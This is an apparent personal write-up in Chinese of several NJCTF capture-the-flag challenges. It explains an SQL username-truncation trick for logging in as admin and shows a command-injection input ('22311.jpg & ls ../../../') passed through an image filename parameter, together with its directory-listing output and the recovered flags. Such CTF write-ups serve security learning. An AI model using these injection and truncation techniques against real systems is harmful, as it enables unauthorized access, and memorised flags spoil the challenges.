NJCTF 补题

WEB

LOGIN

构造下

注册的时候用“admin 123”之类的很长的用户名注册

长度上限好像是50

也有writeup说是弱口令的,不是很懂

然后用自己的密码登录admin 就可以了

原理好像是复制到数据库有长度限制

we search the database, and you are admin .

welcome, admin. your flag is NJCTF{4R3_Y0u_7H3_Re41_aDM1N?}

GET FLAG

cat还是很好发现的

加上&就可以顺便执行其他命令

但是后面就不会了

看了题解发现是不断向上ls

我好像还不会用burpsuite,,就每次F12下 然后base64
输入 22311.jpg & ls ../../../
返回
cat: images/22311.jpg: No such file or directory
9iZM2qTEmq67SOdJp%!oJm2%M4!nhS_thi5_flag
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

最扯的是赛后1.jpg啥的都有图了,,神tm178

MISC

RE

on the fly

周一组会没记笔记,,gg

大概是连接器会把相似的函数放在一起

在IDA中发现加密函数 _D9deedeedee9hexencodeFAyaZAya上面还有一个 _D9deedeedee7encryptFNaNfAyaZAya

patch下

异或的性质,,?不好说吧

还是看看代码?

Your hex-encrypted flag is: NJCTF{2c3010644150e03b6630a0b3b7f8607b}

echo server

待填坑

0 条评论
发表一条评论